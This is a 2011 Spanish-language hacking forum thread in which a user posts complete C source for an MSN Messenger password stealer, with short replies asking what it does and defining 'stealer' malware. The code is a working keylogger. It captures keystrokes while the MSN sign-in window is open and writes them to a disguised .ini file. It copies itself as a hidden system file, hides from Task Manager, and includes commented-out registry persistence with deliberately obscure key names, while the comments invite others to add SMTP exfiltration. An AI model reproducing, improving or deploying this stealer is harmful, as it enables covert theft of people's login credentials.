Stealer MSN

Iniciado por ANTRAX, Mayo 22, 2011, 10:00:32 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Mayo 22, 2011, 10:00:32 PM Ultima modificación: Febrero 08, 2014, 05:47:50 PM por Expermicid
Código: c
#include <stdlib.h>	
#include <windows.h>
#include <stdio.h>
#include <commctrl.h>
#include <Winuser.h> 
#include <string.h>

// all includes should be standard in dev

/*
   Name: KOrUPt(not tellin)
   Author: KOrUPt
   Description: MSN PWD stealer, searches for PWD prompt and saves it to wordsv80.ini file, maybe someone could add smtp to improve it
   Date Written: 01/10/06 - 04/10/06
   Copyright Holder: KOrUPt, you MAY use, add to this code, but please let me know of any improvments you make, thanks.
*/


void keys(int key,char *file) // if you try and view the exe in notepad it discloses
{ // quite alot of source code(not good), so i may change the key output to codes instead

FILE *key_file;

key_file = fopen(file,"a+");

Sleep(10);

if (key==8)

fprintf(key_file,"%s","[del]");

if (key==13)

fprintf(key_file,"%s","\n");

if (key==32)

fprintf(key_file,"%s"," ");

if (key==VK_CAPITAL)

fprintf(key_file,"%s","[Caps L]");

if (key==VK_TAB)

fprintf(key_file,"%s","[TAB]");

if (key ==VK_CONTROL)

fprintf(key_file,"%s","[CTRL]");

if (key ==VK_PAUSE)

fprintf(key_file,"%s","[PAUSE]");

if (key ==VK_ESCAPE)

fprintf(key_file,"%s","[ESC]");

if (key ==VK_END)

fprintf(key_file,"%s","[END]");

if (key==VK_HOME)

fprintf(key_file,"%s","[HOME]");

if (key ==VK_LEFT)

fprintf(key_file,"%s","[LEFT]");

if (key ==VK_UP)

fprintf(key_file,"%s","[UP]");

if (key ==VK_RIGHT)

fprintf(key_file,"%s","[RIGHT]");

if (key ==VK_DOWN)

fprintf(key_file,"%s","[DOWN]");

if (key ==VK_SNAPSHOT)

fprintf(key_file,"%s","[PRINT]");

if (key ==VK_NUMLOCK)

fprintf(key_file,"%s","[NUM LOCK]");

if (key ==VK_RETURN)

fprintf(key_file,"%s","[ENTER]\n\n");

if (key ==VK_SHIFT)

fprintf(key_file,"%s","[SHIFT]");

if (key ==VK_SPACE)

fprintf(key_file,"%s","[SPACE]");

if (key ==VK_LBUTTON)

fprintf(key_file,"%s","[LM B]");

if (key ==VK_RBUTTON)

fprintf(key_file,"%s","[RM B]");

if (key ==VK_MENU)

fprintf(key_file,"%s","[ALT]");

if (key ==VK_LWIN)

fprintf(key_file,"%s","[Windows key]");

if (key ==VK_ADD)

fprintf(key_file,"%s","[+]");

if (key ==VK_SUBTRACT)

fprintf(key_file,"%s","[-]");

if (key ==VK_DECIMAL)

fprintf(key_file,"%s","[.]");

if (key ==VK_DIVIDE)

fprintf(key_file,"%s","[DIVIDE KEY]");

if (key ==VK_NUMPAD0)

fprintf(key_file,"%s","[NUMPAD 0]");

if (key ==VK_NUMPAD1)

fprintf(key_file,"%s","[NUMPAD 1]");

if (key ==VK_NUMPAD2)

fprintf(key_file,"%s","[NUMPAD 2]");

if (key ==VK_NUMPAD3)

fprintf(key_file,"%s","[NUMPAD 3]");

if (key ==VK_NUMPAD4)

fprintf(key_file,"%s","[NUMPAD 4]");

if (key ==VK_NUMPAD5)

fprintf(key_file,"%s","[NUMPAD 5]");

if (key ==VK_NUMPAD6)

fprintf(key_file,"%s","[NUMPAD 6]");

if (key ==VK_NUMPAD7)

fprintf(key_file,"%s","[NUMPAD 7]");

if (key ==VK_NUMPAD8)

fprintf(key_file,"%s","[NUMPAD 8]");

if (key ==VK_NUMPAD9)

fprintf(key_file,"%s","[NUMPAD 9]");

if (key ==VK_F1)

fprintf(key_file,"%s","[F1 KEY]");

if (key ==VK_F2)

fprintf(key_file,"%s","[F2 KEY]");

if (key ==VK_F3)

fprintf(key_file,"%s","[F3 KEY]");

if (key ==VK_F4)

fprintf(key_file,"%s","[F4 KEY]");

if (key ==VK_F5)

fprintf(key_file,"%s","[F5 KEY]");

if (key ==VK_F6)

fprintf(key_file,"%s","[F6 KEY]");

if (key ==VK_F7)

fprintf(key_file,"%s","[F7 KEY]");

if (key ==VK_F8)

fprintf(key_file,"%s","[F8 KEY]");

if (key ==VK_F9)

fprintf(key_file,"%s","[F9 KEY]");

if (key ==VK_F10)

fprintf(key_file,"%s","[F10 KEY]");

if (key ==VK_F11)

fprintf(key_file,"%s","[F11 KEY]");

if (key ==VK_F12)

fprintf(key_file,"%s","[F12 KEY]");

if (key ==VK_NUMLOCK)

fprintf(key_file,"%s","[NUMLOCK KEY]");

if (key ==VK_SCROLL)

fprintf(key_file,"%s","[SCROLL LOCK]");


/*   // WONT WORK ON WIN 9X


if (key ==VK_OEM_PLUS)

fprintf(key_file,"%s","[+]");

if (key ==VK_OEM_COMMA)

fprintf(key_file,"%s","[,]");

if (key ==VK_OEM_MINUS)

fprintf(key_file,"%s","[-]");

if (key ==VK_OEM_PERIOD)

fprintf(key_file,"%s","[.]");

*/

if (key ==190 || key==110)

fprintf(key_file,"%s",".");


if (key >=96 && key <= 105){

key = key - 48;

fprintf(key_file,"%s",&key);

}

if (key >=48 && key <= 59)

fprintf(key_file,"%s",&key);



if (key !=VK_LBUTTON || key !=VK_RBUTTON){

if (key >=65 && key <=90){

if (GetKeyState(VK_CAPITAL))

fprintf(key_file,"%s",&key);
else

{

key = key +32;

fprintf(key_file,"%s",&key);



}
}

}

fclose(key_file);



}


char buffer[300] = "";
HWND currentwin;
DWORD pid;
unsigned char reg[2] = "1";
HMODULE modH = GetModuleHandle(0);
char dir[255];
char dir2[MAX_PATH];
char dir3[MAX_PATH];
char KeyLogPath[MAX_PATH];   // holds dir path for wordsv80.ini


  // Functions

BOOL CALLBACK block(HWND hwnd,LPARAM lParam)  // used to hide from taskmgr
{
char classname[150] = "";
char windowtext[150] = "";

GetWindowText(hwnd,windowtext,149);
GetClassName(hwnd,classname,249);

   
if (strstr(windowtext,"Processes") && strstr(classname,"SysListView32") !=NULL)
{
SendMessage(hwnd,LVM_DELETEALLITEMS,0,0);  // clears Taskmgr every x seconds
return FALSE;
}
return TRUE;
}

DWORD WINAPI HideProgram() // also used to hide from taskmgr
{
  for(;;)
{
Sleep(5);
EnumChildWindows(FindWindow(0,"Windows Task Manager"),block,0);   // calls block function evrey 5 milee seconds
}
}



int WINAPI WinMain(HINSTANCE Instance, HINSTANCE PreviousInstance, LPSTR CommandLine,int ShowCommand)
{

char i;
GetWindowsDirectory(KeyLogPath,sizeof(KeyLogPath));
strcat(KeyLogPath,"//wordsv80.ini");   // this is the file that keys are saved to



   // Add to system folder

GetModuleFileName(modH, dir2, 256);
GetSystemDirectory(dir,255);

strcat(dir,"\\Sndserv.exe"); // Name of program, was going to use a NeverShowExt key to hide a secondry extension,
CopyFile(dir2,dir,FALSE); //  but dont know how to change the icon pic, lol, will learn how to soon though
unsigned char dir3[25] = "Sndserv.exe";
SetFileAttributes(dir, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); // work it out



// Add to registry

// I think weird decimal vaules makes it less likly to be deleted because it
// hasnt got any spefic name, it could be somthing really importent, dont forget,
// most people are quite scared of editing there reigstry in case they ruin the whole pc,
// if they see something they dont understand, then the old phase "better save than sorry" springs to mind
// i think theyd rather leave it than risk it, of course if there sure they know what there doin then fine,
// but im talkin about the N0oBs here, sorry noobs lol

// oh well back to the code
/*
HKEY key1;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE, &key1 );
RegSetValueEx(key1, "1x00387z",0,REG_SZ, dir3,sizeof(dir3));
RegCloseKey(key1);


HKEY key2;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce",0,KEY_SET_VALUE, &key2 );
RegSetValueEx(key2, "62x402b",0,REG_SZ, dir3,sizeof(dir3)); // again weird decimal names,
RegCloseKey(key2); //  i dont fully know how this key will react on startup, should be alright lol



HKEY key3;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_SET_VALUE, &key3 );
RegSetValueEx(key3, "87x409x",0,REG_SZ, dir3,sizeof(dir3)); // yey more weird decimal names lol
RegCloseKey(key3);

HKEY key4;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",0,KEY_SET_VALUE, &key4 );
RegSetValueEx(key4, "95x00x8z",0,REG_SZ, dir3,sizeof(dir3)); // i think you get the msg
RegCloseKey(key4);


// was goin to disable regedit, but decided not to
// in case made the user suspicuos, i prefer the stealth method

  */



  while(1)
{
Sleep(20);   // to some save cpu



// Just in case we need an emergency exit
   if (GetAsyncKeyState(VK_CONTROL) && GetAsyncKeyState(VK_TAB) && GetAsyncKeyState(VK_F5) && GetAsyncKeyState(VK_F8))
   {
   MessageBox (NULL, "" , "", 0 + MB_ICONEXCLAMATION); // no information disclosed, just notfication
return 0;
   }

// cannot close program while login box is present
jump:
currentwin =  GetForegroundWindow();
GetWindowText(currentwin,(char*)buffer,300);
if(strstr(buffer,"Sign in to .NET messenger Service- MSN Messenger"))  // or anything else you want a password to lol
{
GetWindowThreadProcessId(currentwin,&pid);

for(i=8;i<=190;i++) // activate keyloger
{
if (GetAsyncKeyState(i) == -32767)
{




keys (i,KeyLogPath);   // loop through keys function and add keys pressed to file


  goto jump; // to recheck if logon window is still active, if not continue searching untill found
}
}
}
}
}



Cual es la funcion de esto?   :o :o (Pusiste buenos codigos fuente! gracias)

Stealer (en español "ladrón de información") es el nombre genérico de programas informáticos maliciosos del tipo troyano, que se introducen a través de internet en un ordenador con el propósito de obtener de forma fraudulenta información confidencial del propietario, tal como su nombre de acceso a sitios web, contraseña o número de tarjeta de crédito.

Infostealer puede afectar también al servicio de correo electrónico MSN Messenger, enviando mensajes falsos e incluso introduciendo en ellos datos incluidos por los usuarios en sus mensajes a través de dicho servicio.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ;)